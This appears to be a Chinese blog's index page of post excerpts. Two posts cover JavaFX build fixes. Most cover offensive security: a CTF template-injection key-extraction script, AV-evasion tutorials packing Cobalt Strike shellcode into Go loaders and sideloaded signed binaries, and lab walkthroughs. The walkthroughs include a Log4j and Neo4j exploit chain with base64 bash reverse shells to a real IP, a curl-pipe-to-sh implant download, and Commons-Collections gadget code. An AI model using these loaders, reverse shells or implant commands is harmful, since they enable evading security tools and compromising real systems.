月光倾泻与山海，你跌进我的梦里

# 问题描述 用IDEA运行JavaFX的文件时，会发现报错java:找不到模块:eu.hansolo.fx.* # 解决方案： 根据如下步骤操作即可： 1. 打开文件，点击项目结构 ​​​​ 2. 点击模块 -> 依赖，发现有四个依赖，刚好是提示报错的 3. 将其全部从运行时，改为编译就可以了

# 问题描述 在本地编辑器运行 JavaFX 应用程序时，可以正常运行，但是当我们将 JavaFX 打包成 jar 包以后，用命令打开时，会提示 JavaFX 报错缺少 JavaFX 运行时组件 java -jar xx.jar # 原因分析： 因为 Java 8 之后，JavaFX 从 JDK 中分离了出来，在 Java 9 时，Java 引入了 Java 模块系统。从那之后，JavaFX 需要使用 Java 模块系统来运行 JavaFX。作者是用的 Java17 写的，在本地的 Java17 中，没有 JavaFX，因为 JavaFX 从 JDK 分离了，所以用 Java 命令打开时不能正常打开 jar 包。 # 解决方案： # 方法一、Java 模块系统 构建 Java 模块系统需要在顶级目录中添加一个模块声明文件 module-info.java # 方法二、使用引导类 作者在操作时，将 Java 模块系统删除之后再用引导类，还是报错，我恢复 module-info.java 后再使用引导类，就可以正常打开了 使用引导类来启动真正的主类，如下图所示： Main.java ...

# 也是挺新奇的，居然出 rust 的题目 用脚本跑出密钥 以下是 rust 模板注入脚本 import string import time import requests url = "https://fc7fbb5d64-db8984aadc-3.hn2024.thudart.com/text" def getflag(re): payload = """text={%for%20char%20in%20get_env(name="SECRET_KEY")%}{%if%20char%20is%20matching('tttt')%20%}1{%else%}0{%endif%}{%endfor%}""".replace("tttt", re) headers = { "Content-Type": "ap ...

# 前言 本篇知识学习于大白哥，目前只能绕过 huorong，defender，各位师傅可用看一下。 # 无阶段 shellcode 1、同样先用 cs 生成无阶段 shellcode # sgn 加密 2、利用 sgn 加密工具，将生成的 bin 文件加密 sgn -a 64 -c 1 -o pd.bin beacon.bin # CS profile 3、cs 启动利用 修改过 cs 内存特征的 profile 文件 ./teamserver 117.50.196.44 bp bypasshuorong6.0.profile # sctool 转换 4、将生成的 bp.bin 文件用 sctool 工具转化为十六进制，输出到 pb.txt 中 我已经将工具添加到环境变量中了 sctool -f pb.bin > pb.txt # 生成 exe 5、将 pb.txt 中的 shellcode 复制到 buildfile.go 文件对应位置中 go build -o 1.exe buildfile.go buildfile.go package main imp ...

# 前言 本篇知识学习于大白哥，也算是免杀入门了，但是 360 那些还是被杀了，目前只能绕过 defender，各位师傅可用看一下。 # bin 文件 1、首先 cs 生成一个恶意 bin 文件 # 白文件 2、然后找一个白文件 如图：identity_helper.exe 查看数字签名是否可用 此白文件调用了 GetInstallDetailsPayload () 和 SignalInitializeCrashReporting () 两个函数，任意一个函数写入木马就行 package main import "C" import ( "golang.org/x/sys/windows" "syscall" "unsafe" ) //export GetInstallDetailsPayload func GetInstallDetailsPayload() int { sc := []byte{0xe8,0x2b,0x00...} // cs的无 ...

# fscan 直接 fscan 开扫，发现 solar 服务 solar 里面用了 log4j 依赖 # log4j2 jndi 用 JNDIExploit 直接开梭 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNTAuMTk2LjQ0LzY2NjYgMD4mMQoK}|{base64,-d}|{bash,-i}" -A "117.50.196.44" //6666端口 Yakit 抓包发送 反弹成功 # vshell 老规矩，直接命令上线 vshell (curl -fsSL -m180 117.50.196.44:8084/slt||wget -T180 -q 117.50.196.44:8084/slt)|sh 然后搭建一个代理就行，链接 kali proxychains # grc 提权 上去之后没找 ...

# fscan 扫描 先扫内网 fscan64.exe -h 39.101.186.145 -p 1-65535 # Neo4j Browser nday(rce) 在 Neo4j 3.4.18 及以前，如果开启了 Neo4j Shell 接口，攻击者将可以通过 RMI 协议以未授权的身份调用任意方法，其中 setSessionVariable 方法存在反序列化漏洞。因为这个漏洞并非 RMI 反序列化，所以不受到 Java 版本的影响。在 Neo4j 3.5 及之后的版本，Neo4j Shell 被 Cyber Shell 替代。 注意：java 版本要正确 (java8) java -jar rhino_gadget.jar rmi://39.99.248.15:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTcuNTAuMTk2LjQ0LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" //6666 # find ...

# 前言： 很久之前就发现了春秋云镜这个 yyds 平台，霄壤实验室的，内网练习好靶场，但是由于经费紧张，就很长时间没碰了，最近参加比赛成绩比较好，实验室老师给了我们一笔资金来学习，就买了一些沙砾，开始兴奋起来了！直接开始。 # Rustscan 扫描 命令 rustscan.exe -u 10000 -a 39.101.131.233 发现 1433 mssql 开放 # fscan 扫描 命令 fscan.exe -h 39.101.131.233 扫描出了 mssql 弱口令 sa 1qaz!QAZ # Multiple Database Utilization (数据库) 直接右键添加 mssql 数据库 1qaz!QAZ # shell1 成功拿到第一个 shell # CS 派生 直接创建监听器，然后生成 exe 木马，通过数据库上传到 windows 直接运行 exe 文件，发现 cs 已经上线 # WIN-WEB 提权 # PrintSpoofer.exe 提权 (system) 命令： shell C:\\Users\\Public\\Print ...

# 本文知识点： 测试环境：3.1-3.2.1，jdk1.7,1.8 这里仍然是想法子触发 LazyMap.get ()。Hashtable 的 readObject 中。遇到 hash 碰撞时，通过调用一个对象的 equals 方法对比两个对象判断是真的 hash 碰撞。这里的 equals 方法是 AbstractMap 的 equals 方法。 # 正文： 直接上代码 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; impor ...

# 本文知识点： 测试环境：3.1-3.2.1，jdk1.7,1.8 CC5 用了 BadAttributeValueExpException 反序列化去触发 LazyMap.get ()，除了 BadAttributeValueExpException 、AnnotationInvocationHandler 还有其他方法吗？ HashMap! # 正文： 我们再研究研究 TiedMapEntry 这个类 public class TiedMapEntry implements Entry, KeyValue, Serializable { private static final long serialVersionUID = -8453869361373831205L; private final Map map; private final Object key; //构造函数，显然我们可以控制 this.map 为 LazyMap public TiedMapEntry(Map map, Object key) { ...